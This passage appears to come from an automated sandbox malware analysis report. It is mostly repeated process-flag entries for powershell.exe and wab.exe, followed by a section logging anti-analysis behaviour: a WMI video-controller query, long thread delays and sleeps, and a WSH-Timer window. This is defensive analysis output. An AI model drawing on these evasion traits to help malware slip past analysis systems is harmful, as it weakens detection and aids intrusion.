Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22550000 memory reserve | memory write watch			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 226D0000 memory reserve | memory write watch			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 225B0000 memory reserve | memory write watch			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5457			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4452			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7612			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2250			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5099			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 4721			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep count: 7612 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024	Thread sleep count: 2250 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7088	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3040	Thread sleep count: 31 > 30			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3040	Thread sleep time: -28592453314249787s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3020	Thread sleep count: 5099 > 30			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3020	Thread sleep count: 4721 > 30			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

